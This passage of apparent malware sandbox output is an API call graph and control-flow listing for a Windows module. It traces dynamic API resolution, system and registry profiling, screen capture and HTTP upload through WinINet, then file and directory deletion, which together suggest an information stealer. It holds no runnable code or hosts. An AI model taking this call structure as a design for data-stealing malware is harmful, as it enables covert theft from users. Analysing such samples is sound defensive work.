API calls 9630->9634 9632 7ffe11506bc2 GetProcAddress 9631->9632 9635 7ffe11507e50 2 API calls 9632->9635 9636 7ffe11506c6c GetSystemInfo 9633->9636 9637 7ffe11506c57 GetNativeSystemInfo 9633->9637 9634->9621 9635->9627 9638 7ffe11506c7f 9636->9638 9637->9638 9639 7ffe11506cf1 GetSystemMetrics 9638->9639 9640 7ffe11506c91 9638->9640 9639->9640 9641 7ffe11509540 _handle_error 8 API calls 9640->9641 9642 7ffe11505285 9641->9642 9642->9534 9644 7ffe11506890 4 API calls 9643->9644 9645 7ffe11505dac 9644->9645 9646 7ffe1150613e 9645->9646 9648 7ffe11506890 4 API calls 9645->9648 9647 7ffe11509540 _handle_error 8 API calls 9646->9647 9649 7ffe11505312 9647->9649 9650 7ffe11505dca 9648->9650 9649->9540 9668 7ffe11506160 9649->9668 9651 7ffe11506134 9650->9651 9653 7ffe11506890 4 API calls 9650->9653 9686 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9651->9686 9654 7ffe11505de8 9653->9654 9655 7ffe1150612a 9654->9655 9656 7ffe11506890 4 API calls 9654->9656 9685 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9655->9685 9658 7ffe11505e06 9656->9658 9659 7ffe11506120 9658->9659 9660 7ffe11506890 4 API calls 9658->9660 9684 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9659->9684 9662 7ffe11505e24 9660->9662 9663 7ffe11506116 9662->9663 9681 7ffe11506950 GetProcessHeap RtlAllocateHeap 9662->9681 9683 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9663->9683 9667 7ffe11505e3f 9682 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9667->9682 9669 7ffe1150617f 9668->9669 9687 7ffe11506950 GetProcessHeap RtlAllocateHeap 9669->9687 9671 7ffe115061fc 9671->9558 9672 7ffe11506189 9672->9671 9688 7ffe11506950 GetProcessHeap RtlAllocateHeap 9672->9688 9674 7ffe115061be 9675 7ffe115061cb MultiByteToWideChar 9674->9675 9676 7ffe115061f2 9674->9676 9675->9676 9689 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9676->9689 9678->9558 9679->9545 9680->9540 9681->9667 9682->9663 
9683->9659 9684->9655 9685->9651 9686->9646 9687->9672 9688->9674 9689->9671 9793 7ffe11506210 9690->9793 9693 7ffe11507d50 10 API calls 9694 7ffe11506369 9693->9694 9695 7ffe11507d50 10 API calls 9694->9695 9696 7ffe1150637a 9695->9696 9697 7ffe11507d50 10 API calls 9696->9697 9698 7ffe1150638b 9697->9698 9699 7ffe11507d50 10 API calls 9698->9699 9700 7ffe1150639c 9699->9700 9701 7ffe11507d50 10 API calls 9700->9701 9702 7ffe115063ad 9701->9702 9703 7ffe115063d5 9702->9703 9704 7ffe115065ef 9702->9704 9706 7ffe11507d50 10 API calls 9703->9706 9705 7ffe11507e50 2 API calls 9704->9705 9707 7ffe115065f9 9705->9707 9708 7ffe115063ee 9706->9708 9709 7ffe11507e50 2 API calls 9707->9709 9710 7ffe11507d50 10 API calls 9708->9710 9711 7ffe11506603 9709->9711 9720 7ffe1150640d wcscat wcscpy 9710->9720 9712 7ffe11507e50 2 API calls 9711->9712 9713 7ffe1150660d 9712->9713 9714 7ffe11507e50 2 API calls 9713->9714 9715 7ffe11506617 9714->9715 9716 7ffe11507e50 2 API calls 9715->9716 9717 7ffe11506621 9716->9717 9718 7ffe11509540 _handle_error 8 API calls 9717->9718 9719 7ffe11506633 9718->9719 9719->9570 9721 7ffe1150647e ExpandEnvironmentStringsW ExpandEnvironmentStringsW 9720->9721 9722 7ffe115064c8 wcscat wcscpy 9721->9722 9723 7ffe1150651f DeleteFileW DeleteFileW 9722->9723 9724 7ffe1150654a wcscat wcscpy 9723->9724 9725 7ffe115065a1 DeleteFileW DeleteFileW RemoveDirectoryW RemoveDirectoryW 9724->9725 9726 7ffe11507e50 2 API calls 9725->9726 9727 7ffe115065e0 9726->9727 9728 7ffe11507e50 2 API calls 9727->9728 9729 7ffe115065ea 9728->9729 9729->9570 9851 7ffe1150cf18 9730->9851 9736 7ffe11504359 9735->9736 9737 7ffe11504384 9735->9737 9738 7ffe11507d50 10 API calls 9736->9738 9739 7ffe115043c2 9737->9739 9741 7ffe11507c50 10 API calls 9737->9741 9740 7ffe11504365 LoadLibraryW 9738->9740 9742 7ffe11504400 9739->9742 9743 7ffe11507c50 10 API calls 9739->9743 9745 7ffe11507e50 2 API calls 9740->9745 9746 7ffe1150439b GetProcAddress 9741->9746 9744 7ffe11504433 9742->9744 9748 
7ffe11507d50 10 API calls 9742->9748 9747 7ffe115043d9 GetProcAddress 9743->9747 9752 7ffe11507c50 10 API calls 9744->9752 9755 7ffe1150447a 9744->9755 9745->9737 9749 7ffe11507e50 2 API calls 9746->9749 9750 7ffe11507e50 2 API calls 9747->9750 9751 7ffe11504414 LoadLibraryW 9748->9751 9749->9739 9750->9742 9753 7ffe11507e50 2 API calls 9751->9753 9754 7ffe1150444a GetProcAddress 9752->9754 9753->9744 9756 7ffe11507e50 2 API calls 9754->9756 9757 7ffe1150468a 9755->9757 9758 7ffe11507d50 10 API calls 9755->9758 9756->9755 9759 7ffe11509540 _handle_error 8 API calls 9757->9759 9760 7ffe115044cd wcscat 9758->9760 9761 7ffe1150469e 9759->9761 9762 7ffe11507e50 2 API calls 9760->9762 9761->9583 9761->9584 9763 7ffe115044f7 9762->9763 9764 7ffe1150450f 9763->9764 9765 7ffe1150453e 9763->9765 9767 7ffe11507d50 10 API calls 9764->9767 9766 7ffe11507d50 10 API calls 9765->9766 9768 7ffe1150454a wcscat 9766->9768 9769 7ffe1150451b wcscat 9767->9769 9771 7ffe11507e50 2 API calls 9768->9771 9770 7ffe11507e50 2 API calls 9769->9770 9772 7ffe1150453c 9770->9772 9773 7ffe1150456b GetModuleFileNameW 9771->9773 9772->9773 9774 7ffe115045a1 9773->9774 9774->9757 9775 7ffe11507d50 10 API calls 9774->9775 9776 7ffe115045b5 9775->9776 9777 7ffe115045c5 9776->9777 9778 7ffe11504662 9776->9778 9779 7ffe11507d50 10 API calls 9777->9779 9780 7ffe115085c0 28 API calls 9778->9780 9781 7ffe115045d1 9779->9781 9782 7ffe11504660 9780->9782 9783 7ffe11501cc0 swprintf 48 API calls 9781->9783 9784 7ffe11507e50 2 API calls 9782->9784 9785 7ffe11504611 9783->9785 9784->9757 9786 7ffe11507e50 2 API calls 9785->9786 9787 7ffe1150461e 9786->9787 9788 7ffe11507d50 10 API calls 9787->9788 9789 7ffe1150462a 9788->9789 9857 7ffe115085c0 9789->9857 9792 7ffe11507e50 2 API calls 9792->9782 9802 7ffe11508aa0 9793->9802 9795 7ffe115062f5 9795->9693 9796 7ffe115062eb 9815 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9796->9815 9798 7ffe11507d50 10 API calls 9799 7ffe11506230 9798->9799 
9799->9795 9799->9796 9799->9798 9801 7ffe11507e50 2 API calls 9799->9801 9810 7ffe11508940 9799->9810 9801->9799 9816 7ffe11508cf0 9802->9816 9804 7ffe11508cb9 9804->9799 9805 7ffe11508ab6 9805->9804 9850 7ffe11506950 GetProcessHeap RtlAllocateHeap 9805->9850 9807 7ffe11508cae CoTaskMemFree 9807->9804 9808 7ffe11508c99 CoTaskMemFree 9809 7ffe11508bc2 wcscpy 9808->9809 9809->9807 9809->9808 9811 7ffe11508cf0 20 API calls 9810->9811 9812 7ffe11508956 9811->9812 9813 7ffe11508a5e 9812->9813 9814 7ffe11508a69 Sleep 9812->9814 9813->9799 9814->9812 9815->9795 9817 7ffe11508d45 9816->9817 9818 7ffe11508d4a 9816->9818 9817->9805 9819 7ffe11508d81 9818->9819 9820 7ffe11507d50 10 API calls 9818->9820 9821 7ffe11508dbf 9819->9821 9824 7ffe11507c50 10 API calls 9819->9824 9823 7ffe11508d60 LoadLibraryW 9820->9823 9822 7ffe11508df6 9821->9822 9826 7ffe11507d50 10 API calls 9821->9826 9827 7ffe11508e34 9822->9827 9831 7ffe11507c50 10 API calls 9822->9831 9828 7ffe11507e50 2 API calls 9823->9828 9825 7ffe11508d97 GetProcAddress 9824->9825 9829 7ffe11507e50 2 API calls 9825->9829 9830 7ffe11508dd5 LoadLibraryW 9826->9830 9832 7ffe11508e72 9827->9832 9835 7ffe11507c50 10 API calls 9827->9835 9828->9819 9829->9821 9833 7ffe11507e50 2 API calls 9830->9833 9834 7ffe11508e0c GetProcAddress 9831->9834 9836 7ffe11507c50 10 API calls 9832->9836 9838 7ffe11508eb0 9832->9838 9833->9822 9839 7ffe11507e50 2 API calls 9834->9839 9840 7ffe11508e4a GetProcAddress 9835->9840 9842 7ffe11508e88 GetProcAddress 9836->9842 9837 7ffe11508ee7 9837->9817 9846 7ffe11507c50 10 API calls 9837->9846 9838->9837 9843 7ffe11507d50 10 API calls 9838->9843 9839->9827 9841 7ffe11507e50 2 API calls 9840->9841 9841->9832 9844 7ffe11507e50 2 API calls 9842->9844 9845 7ffe11508ec6 LoadLibraryW 9843->9845 9844->9838 9847 7ffe11507e50 2 API calls 9845->9847 9848 7ffe11508efd GetProcAddress 9846->9848 9847->9837 9849 7ffe11507e50 2 API calls 9848->9849 9849->9817 9850->9809 9852 7ffe1150f98c abort 36 API calls 
9851->9852 9853 7ffe11504d99 9852->9853 9854 7ffe1150ceec 9853->9854 9855 7ffe1150f98c abort 36 API calls 9854->9855 9856 7ffe11504d9e 9855->9856 9856->9573 9858 7ffe11508cf0 20 API calls 9857->9858 9862 7ffe115085f5 memcpy_s 9858->9862 9859 7ffe115087ec wcscpy 9860 7ffe11509540 _handle_error 8 API calls 9859->9860 9861 7ffe1150464f 9860->9861 9861->9792 9862->9859 9864 7ffe11508f40 9862->9864 9865 7ffe11508fce 9864->9865 9866 7ffe11508fa1 9864->9866 9868 7ffe1150900c 9865->9868 9870 7ffe11507c50 10 API calls 9865->9870 9867 7ffe11507d50 10 API calls 9866->9867 9869 7ffe11508fad LoadLibraryW 9867->9869 9871 7ffe1150904a 9868->9871 9875 7ffe11507c50 10 API calls 9868->9875 9873 7ffe11507e50 2 API calls 9869->9873 9874 7ffe11508fe4 GetProcAddress 9870->9874 9872 7ffe11509081 9871->9872 9876 7ffe11507d50 10 API calls 9871->9876 9877 7ffe115090bf 9872->9877 9881 7ffe11507c50 10 API calls 9872->9881 9873->9865 9878 7ffe11507e50 2 API calls 9874->9878 9879 7ffe11509022 GetProcAddress 9875->9879 9880 7ffe11509060 LoadLibraryW 9876->9880 9882 7ffe115090fd 9877->9882 9887 7ffe11507c50 10 API calls 9877->9887 9878->9868 9883 7ffe11507e50 2 API calls 9879->9883 9885 7ffe11507e50 2 API calls 9880->9885 9886 7ffe11509097 GetProcAddress 9881->9886 9884 7ffe1150913b 9882->9884 9888 7ffe11507c50 10 API calls 9882->9888 9883->9871 9892 7ffe11507c50 10 API calls 9884->9892 9898 7ffe11509179 9884->9898 9885->9872 9889 7ffe11507e50 2 API calls 9886->9889 9890 7ffe115090d5 GetProcAddress 9887->9890 9891 7ffe11509113 GetProcAddress 9888->9891 9889->9877 9893 7ffe11507e50 2 API calls 9890->9893 9894 7ffe11507e50 2 API calls 9891->9894 9895 7ffe11509151 GetProcAddress 9892->9895 9893->9882 9894->9884 9896 7ffe11507e50 2 API calls 9895->9896 9896->9898 9897 7ffe11509241 9897->9859 9898->9897 9902 7ffe11506950 GetProcessHeap RtlAllocateHeap 9898->9902 9900 7ffe115091d3 9900->9897 9903 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9900->9903 9902->9900 9903->9897 10464 
7ffe11503b48 10465 7ffe11503b52 memcpy_s 10464->10465 10466 7ffe11503ba7 WSACleanup 10465->10466 10468 7ffe11503b89 inet_ntoa 10465->10468 10467 7ffe11503bad 10466->10467 10469 7ffe11507d50 10 API calls 10467->10469 10470 7ffe11503ba3 10468->10470 10471 7ffe11503bb9 RegOpenKeyExW 10469->10471 10470->10466 10472 7ffe11503d1d 10471->10472 10473 7ffe11503bf4 10471->10473 10474 7ffe11507e50 2 API calls 10472->10474 10475 7ffe11507d50 10 API calls 10473->10475 10476 7ffe11503d2a GlobalMemoryStatusEx 10474->10476 10485 7ffe11503c00 10475->10485 10477 7ffe11503d47 10476->10477 10479 7ffe11506890 4 API calls 10477->10479 10478 7ffe11503c19 RegEnumKeyExW 10480 7ffe11503c6c RegOpenKeyExW 10478->10480 10481 7ffe11503cd8 10478->10481 10483 7ffe11503d6a 10479->10483 10484 7ffe11503c9c RegQueryValueExW 10480->10484 10480->10485 10482 7ffe11507e50 2 API calls 10481->10482 10486 7ffe11503d0f RegCloseKey 10482->10486 10487 7ffe11503f3f 10483->10487 10494 7ffe11506950 GetProcessHeap RtlAllocateHeap 10483->10494 10484->10481 10488 7ffe11503cf2 RegCloseKey 10484->10488 10485->10478 10485->10481 10486->10472 10489 7ffe11509540 _handle_error 8 API calls 10487->10489 10488->10485 10491 7ffe11503f57 10489->10491 10493 7ffe11503d85 10495 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10493->10495 10494->10493 10495->10487 10496 7ffe11505a48 10505 7ffe11503470 10496->10505 10499 7ffe11505b42 10500 7ffe11501f20 39 API calls 10501 7ffe11505b21 10500->10501 10502 7ffe11505b38 10501->10502 10520 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10501->10520 10521 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10502->10521 10506 7ffe115034d0 10505->10506 10507 7ffe1150352d 10506->10507 10508 7ffe11507f60 78 API calls 10506->10508 10522 7ffe11506950 GetProcessHeap RtlAllocateHeap 10507->10522 10508->10507 10510 7ffe1150353b 10511 7ffe115035b5 10510->10511 10512 7ffe115035a2 10510->10512 10519 7ffe11503604 10510->10519 10515 7ffe11507c50 10 API 
calls 10511->10515 10514 7ffe11507c50 10 API calls 10512->10514 10513 7ffe11509540 _handle_error 8 API calls 10516 7ffe115036c7 10513->10516 10517 7ffe115035ae 10514->10517 10515->10517 10516->10499 10516->10500 10518 7ffe11507e50 2 API calls 10517->10518 10518->10519 10519->10513 10520->10502 10521->10499 10522->10510 10555 7ffe1151094c 10565 7ffe115150ac 10555->10565 10566 7ffe115150b8 10565->10566 10588 7ffe11510d9c EnterCriticalSection 10566->10588 8203 7ffe115055ed 8212 7ffe115038a0 8203->8212 8206 7ffe115056a9 8209 7ffe1150569f 8299 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8209->8299 8300 7ffe115074e0 8212->8300 8215 7ffe11503a47 8391 7ffe11509540 8215->8391 8220 7ffe11503902 memcpy_s 8390 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8220->8390 8221 7ffe11501f20 8222 7ffe1150200b 8221->8222 8223 7ffe11502041 8221->8223 8224 7ffe11507d50 10 API calls 8222->8224 8225 7ffe1150204b 8223->8225 8226 7ffe11502088 8223->8226 8229 7ffe11502017 LoadLibraryW 8224->8229 8230 7ffe11507c50 10 API calls 8225->8230 8227 7ffe11502092 8226->8227 8228 7ffe115020cf 8226->8228 8231 7ffe11507c50 10 API calls 8227->8231 8232 7ffe115020d9 8228->8232 8233 7ffe11502116 8228->8233 8234 7ffe11507e50 2 API calls 8229->8234 8235 7ffe11502057 GetProcAddress 8230->8235 8237 7ffe1150209e GetProcAddress 8231->8237 8238 7ffe11507c50 10 API calls 8232->8238 8239 7ffe1150215d 8233->8239 8240 7ffe11502120 8233->8240 8234->8223 8236 7ffe11507e50 2 API calls 8235->8236 8236->8226 8243 7ffe11507e50 2 API calls 8237->8243 8244 7ffe115020e5 GetProcAddress 8238->8244 8241 7ffe11502167 8239->8241 8242 7ffe115021a4 8239->8242 8245 7ffe11507c50 10 API calls 8240->8245 8246 7ffe11507c50 10 API calls 8241->8246 8247 7ffe115021eb 8242->8247 8248 7ffe115021ae 8242->8248 8243->8228 8249 7ffe11507e50 2 API calls 8244->8249 8250 7ffe1150212c GetProcAddress 8245->8250 8251 7ffe11502173 GetProcAddress 8246->8251 8253 7ffe115021f5 8247->8253 8254 7ffe11502232 8247->8254 
8252 7ffe11507c50 10 API calls 8248->8252 8249->8233 8255 7ffe11507e50 2 API calls 8250->8255 8258 7ffe11507e50 2 API calls 8251->8258 8259 7ffe115021ba GetProcAddress 8252->8259 8260 7ffe11507c50 10 API calls 8253->8260 8256 7ffe1150223c 8254->8256 8257 7ffe11502279 InternetOpenW 8254->8257 8255->8239 8261 7ffe11507c50 10 API calls 8256->8261 8262 7ffe115022a8 InternetSetOptionW InternetSetOptionW InternetSetOptionW InternetConnectW 8257->8262 8263 7ffe11502686 8257->8263 8258->8242 8264 7ffe11507e50 2 API calls 8259->8264 8265 7ffe11502201 GetProcAddress 8260->8265 8266 7ffe11502248 GetProcAddress 8261->8266 8267 7ffe1150267b InternetCloseHandle 8262->8267 8268 7ffe11502359 8262->8268 8263->8209 8298 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8263->8298 8264->8247 8269 7ffe11507e50 2 API calls 8265->8269 8270 7ffe11507e50 2 API calls 8266->8270 8267->8263 8271 7ffe115023a5 8268->8271 8272 7ffe1150238f 8268->8272 8269->8254 8270->8257 8274 7ffe11507d50 10 API calls 8271->8274 8273 7ffe11507d50 10 API calls 8272->8273 8275 7ffe1150239b HttpOpenRequestW 8273->8275 8274->8275 8277 7ffe11507e50 2 API calls 8275->8277 8278 7ffe1150242a 8277->8278 8279 7ffe1150266d InternetCloseHandle 8278->8279 8280 7ffe115024d4 SetLastError HttpSendRequestW 8278->8280 8283 7ffe11507d50 10 API calls 8278->8283 8279->8267 8281 7ffe1150250d GetLastError 8280->8281 8282 7ffe1150259b 8280->8282 8284 7ffe1150252b InternetQueryOptionW InternetSetOptionW HttpSendRequestW 8281->8284 8285 7ffe11502521 8281->8285 8481 7ffe11506950 GetProcessHeap RtlAllocateHeap 8282->8481 8288 7ffe11502451 8283->8288 8284->8282 8285->8282 8285->8284 8287 7ffe11502662 InternetCloseHandle 8287->8279 8482 7ffe11506950 GetProcessHeap RtlAllocateHeap 8288->8482 8289 7ffe115025c6 InternetReadFile 8290 7ffe11502634 8289->8290 8291 7ffe115025a5 8289->8291 8292 7ffe1150263b 8290->8292 8484 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8290->8484 8291->8287 8291->8289 8291->8290 8483 7ffe115069b0 GetProcessHeap HeapReAlloc 8291->8483 8292->8287 8296 7ffe11507e50 2 API calls 8296->8280 8297 7ffe11502496 wcscat wcscpy 8297->8296 8298->8209 8299->8206 8301 7ffe115075a4 8300->8301 8302 7ffe115075d1 8300->8302 8303 7ffe11507d50 10 API calls 8301->8303 8304 7ffe115075db 8302->8304 8305 7ffe1150760f 8302->8305 8306 7ffe115075b0 LoadLibraryW 8303->8306 8409 7ffe11507c50 8304->8409 8308 7ffe11507619 8305->8308 8309 7ffe11507646 8305->8309 8310 7ffe11507e50 2 API calls 8306->8310 8312 7ffe11507d50 10 API calls 8308->8312 8313 7ffe11507684 8309->8313 8314 7ffe11507650 8309->8314 8310->8302 8317 7ffe11507625 LoadLibraryW 8312->8317 8315 7ffe115076bb 8313->8315 8400 7ffe11507d50 8313->8400 8318 7ffe11507c50 10 API calls 8314->8318 8321 7ffe115076f9 8315->8321 8322 7ffe115076c5 8315->8322 8316 7ffe11507e50 2 API calls 8316->8305 8323 7ffe11507e50 2 API calls 8317->8323 8319 7ffe1150765c GetProcAddress 8318->8319 8324 7ffe11507e50 2 API calls 8319->8324 8327 7ffe11507737 8321->8327 8328 7ffe11507703 8321->8328 8326 7ffe11507c50 10 API calls 8322->8326 8323->8309 8324->8313 8332 7ffe115076d1 GetProcAddress 8326->8332 8329 7ffe11507775 8327->8329 8330 7ffe11507741 8327->8330 8333 7ffe11507c50 10 API calls 8328->8333 8335 7ffe115077bc 8329->8335 8336 7ffe1150777f 8329->8336 8334 7ffe11507c50 10 API calls 8330->8334 8337 7ffe11507e50 2 API calls 8332->8337 8338 7ffe1150770f GetProcAddress 8333->8338 8340 7ffe1150774d GetProcAddress 8334->8340 8342 7ffe115077c6 8335->8342 8343 7ffe11507803 8335->8343 8341 7ffe11507c50 10 API calls 8336->8341 8337->8321 8339 7ffe11507e50 2 API calls 8338->8339 8339->8327 8346 7ffe11507e50 2 API calls 8340->8346 8347 7ffe1150778b GetProcAddress 8341->8347 8348 7ffe11507c50 10 API calls 8342->8348 8344 7ffe1150780d 8343->8344 8345 7ffe1150784a 8343->8345 8349 7ffe11507c50 10 API calls 8344->8349 8350 7ffe11507854 8345->8350 8351 7ffe11507891 8345->8351 8346->8329 8352 7ffe11507e50 2 API calls 8347->8352 8353 7ffe115077d2 GetProcAddress 8348->8353 8354 7ffe11507819 GetProcAddress 8349->8354 8355 7ffe11507c50 10 API calls 8350->8355 8356 7ffe1150789b 8351->8356 8357 7ffe115078d1 8351->8357 8352->8335 8358 7ffe11507e50 2 API calls 8353->8358 8361 7ffe11507e50 2 API calls 8354->8361 8362 7ffe11507860 GetProcAddress 8355->8362 8363 7ffe11507d50 10 API calls 8356->8363 8359 7ffe115078db 8357->8359 8360 7ffe11507918 8357->8360 8358->8343 8364 7ffe11507c50 10 API calls 8359->8364 8365 7ffe11507922 SetProcessDPIAware 8360->8365 8374 7ffe11507928 8360->8374 8361->8345 8366 7ffe11507e50 2 API calls 8362->8366 8367 7ffe115078a7 LoadLibraryW 8363->8367 8368 7ffe115078e7 GetProcAddress 8364->8368 8365->8374 8366->8351 8369 7ffe11507e50 2 API calls 8367->8369 8370 7ffe11507e50 2 API calls 8368->8370 8369->8357 8370->8360 8371 7ffe11507b5b 8372 7ffe11509540 _handle_error 8 API calls 8371->8372 8373 7ffe115038df 8372->8373 8373->8215 8389 7ffe11506950 GetProcessHeap RtlAllocateHeap 8373->8389 8374->8371 8414 7ffe11506950 GetProcessHeap RtlAllocateHeap 8374->8414 8376 7ffe11507999 8376->8371 8377 7ffe11507b51 8376->8377 8415 7ffe11507b90 8376->8415 8472 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8377->8472 8381 7ffe115079e3 8420 7ffe115070a0 8381->8420 8383 7ffe11507b43 DeleteObject 8383->8377 8386 7ffe11507aba 8387 7ffe11507af0 8386->8387 8471 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8386->8471 8387->8383 8389->8220 8390->8215 8392 7ffe1150954a 8391->8392 8393 7ffe11503a5c 8392->8393 8394 7ffe11509598 IsProcessorFeaturePresent 8392->8394 8393->8206 8393->8221 8395 7ffe115095af 8394->8395 8476 7ffe1150978c RtlCaptureContext 8395->8476 8473 7ffe11506950 GetProcessHeap RtlAllocateHeap 8400->8473 8402 7ffe11509540 _handle_error 8 API calls 8403 7ffe1150769a LoadLibraryW 8402->8403 8405 7ffe11507e50 8403->8405 8404 7ffe11507db5 8404->8402 8406 7ffe11507e93 8405->8406 8407 7ffe11507e61 memcpy_s 8405->8407 8406->8315 8474 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8407->8474 8475 7ffe11506950 GetProcessHeap RtlAllocateHeap 8409->8475 8411 7ffe11509540 _handle_error 8 API calls 8413 7ffe115075e7 GetProcAddress 8411->8413 8412 7ffe11507cb5 8412->8411 8413->8316 8414->8376 8416 7ffe11507d50 10 API calls 8415->8416 8419 7ffe11507bbf memcpy_s 8416->8419 8417 7ffe11507e50 2 API calls 8418 7ffe115079db 8417->8418 8418->8377 8418->8381 8419->8417 8421 7ffe1150715c 8420->8421 8422 7ffe1150712f 8420->8422 8424 7ffe1150719a 8421->8424 8426 7ffe11507c50 10 API calls 8421->8426 8423 7ffe11507d50 10 API calls 8422->8423 8425 7ffe1150713b LoadLibraryW 8423->8425 8427 7ffe115071e1 8424->8427 8430 7ffe11507c50 10 API calls 8424->8430 8428 7ffe11507e50 2 API calls 8425->8428 8429 7ffe11507172 GetProcAddress 8426->8429 8431 7ffe11507c50 10 API calls 8427->8431 8433 7ffe11507228 8427->8433 8428->8421 8434 7ffe11507e50 2 API calls 8429->8434 8435 7ffe115071b0 GetProcAddress 8430->8435 8436 7ffe115071f7 GetProcAddress 8431->8436 8432 7ffe11507268 8438 7ffe115072af 8432->8438 8442 7ffe11507c50 10 API calls 8432->8442 8433->8432 8437 7ffe11507d50 10 API calls 8433->8437 8434->8424 8439 7ffe11507e50 2 API calls 8435->8439 8440 7ffe11507e50 2 API calls 8436->8440 8441 7ffe1150723e LoadLibraryW 8437->8441 8443 7ffe115072f6 8438->8443 8444 7ffe11507c50 10 API calls 8438->8444 8439->8427 8440->8433 8446 7ffe11507e50 2 API calls 8441->8446 8447 7ffe1150727e GetProcAddress 8442->8447 8445 7ffe1150733d 8443->8445 8449 7ffe11507c50 10 API calls 8443->8449 8448 7ffe115072c5 GetProcAddress 8444->8448 8450 7ffe11507384 8445->8450 8454 7ffe11507c50 10 API calls 8445->8454 8446->8432 8451 7ffe11507e50 2 API calls 8447->8451 8452 7ffe11507e50 2 API calls 8448->8452 8453 7ffe1150730c GetProcAddress 8449->8453 8455 7ffe115073cb GetDC 8450->8455 8460 7ffe11507c50 10 API calls 8450->8460 8451->8438 8452->8443 8458 7ffe11507e50 2 API calls 8453->8458 8459 7ffe11507353 GetProcAddress 8454->8459 8456 7ffe115073e4 CreateCompatibleDC 8455->8456 8457 7ffe115074c1 8455->8457 8462 7ffe115074b4 ReleaseDC 8456->8462 8463 7ffe11507400 GetSystemMetrics GetSystemMetrics CreateCompatibleBitmap 8456->8463 8457->8377 8457->8383 8457->8387 8470 7ffe11506950 GetProcessHeap RtlAllocateHeap 8457->8470 8458->8445 8464 7ffe11507e50 2 API calls 8459->8464 8461 7ffe1150739a GetProcAddress 8460->8461 8465 7ffe11507e50 2 API calls 8461->8465 8462->8457 8466 7ffe1150743c SelectObject BitBlt 8463->8466 8467 7ffe115074a9 DeleteObject 8463->8467 8464->8450 8465->8455 8468 7ffe1150748f 8466->8468 8469 7ffe1150749e DeleteObject 8466->8469 8467->8462 8468->8467 8469->8467 8470->8386 8471->8387 8472->8371 8473->8404 8474->8406 8475->8412 8477 7ffe115097a6 RtlLookupFunctionEntry 8476->8477 8478 7ffe115095c2 8477->8478 8479 7ffe115097bc RtlVirtualUnwind 8477->8479 8480 7ffe11509564 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8478->8480 8479->8477 8479->8478 8481->8291 8482->8297 8483->8291 8484->8287

    Control-flow Graph

    control_flow_graph 0 7ffe11501f20-7ffe11502009 1 7ffe1150200b-7ffe1150203c call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 0->1 2 7ffe11502041-7ffe11502049 0->2 1->2 4 7ffe1150204b-7ffe11502083 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 2->4 5 7ffe11502088-7ffe11502090 2->5 4->5 6 7ffe11502092-7ffe115020ca call 7ffe11507c50 GetProcAddress call 7ffe11507e50 5->6 7 7ffe115020cf-7ffe115020d7 5->7 6->7 11 7ffe115020d9-7ffe11502111 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 7->11 12 7ffe11502116-7ffe1150211e 7->12 11->12 18 7ffe1150215d-7ffe11502165 12->18 19 7ffe11502120-7ffe11502158 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 12->19 20 7ffe11502167-7ffe1150219f call 7ffe11507c50 GetProcAddress call 7ffe11507e50 18->20 21 7ffe115021a4-7ffe115021ac 18->21 19->18 20->21 26 7ffe115021eb-7ffe115021f3 21->26 27 7ffe115021ae-7ffe115021e6 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 21->27 32 7ffe115021f5-7ffe1150222d call 7ffe11507c50 GetProcAddress call 7ffe11507e50 26->32 33 7ffe11502232-7ffe1150223a 26->33 27->26 32->33 35 7ffe1150223c-7ffe11502274 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 33->35 36 7ffe11502279-7ffe115022a2 InternetOpenW 33->36 35->36 41 7ffe115022a8-7ffe11502353 InternetSetOptionW * 3 InternetConnectW 36->41 42 7ffe11502686-7ffe11502695 36->42 46 7ffe1150267b-7ffe11502680 InternetCloseHandle 41->46 47 7ffe11502359-7ffe11502369 41->47 46->42 50 7ffe1150236b-7ffe11502373 47->50 51 7ffe11502377-7ffe1150238d 47->51 50->51 52 7ffe115023a5-7ffe115023d0 call 7ffe11507d50 51->52 53 7ffe1150238f-7ffe115023a3 call 7ffe11507d50 51->53 58 7ffe115023d4-7ffe11502430 HttpOpenRequestW call 7ffe11507e50 52->58 53->58 61 7ffe1150266d-7ffe11502675 InternetCloseHandle 58->61 62 7ffe11502436-7ffe1150243f 58->62 61->46 63 7ffe11502445-7ffe115024a1 call 7ffe11507d50 call 7ffe1150ced0 * 2 call 7ffe11506950 62->63 64 7ffe115024d4-7ffe11502507 SetLastError HttpSendRequestW 62->64 89 7ffe115024c7-7ffe115024cf call 7ffe11507e50 63->89 90 7ffe115024a3-7ffe115024c2 call 7ffe1150ceb4 call 7ffe1150ce88 63->90 65 7ffe1150250d-7ffe1150251f GetLastError 64->65 66 7ffe1150259b-7ffe115025b0 call 7ffe11506950 64->66 68 7ffe1150252b-7ffe11502595 InternetQueryOptionW InternetSetOptionW HttpSendRequestW 65->68 69 7ffe11502521-7ffe11502529 65->69 75 7ffe115025b6-7ffe115025be 66->75 76 7ffe11502662-7ffe11502667 InternetCloseHandle 66->76 68->66 69->66 69->68 78 7ffe115025c6-7ffe115025f0 InternetReadFile 75->78 76->61 80 7ffe11502634-7ffe11502639 78->80 81 7ffe115025f2-7ffe115025f7 78->81 82 7ffe1150263b-7ffe11502656 80->82 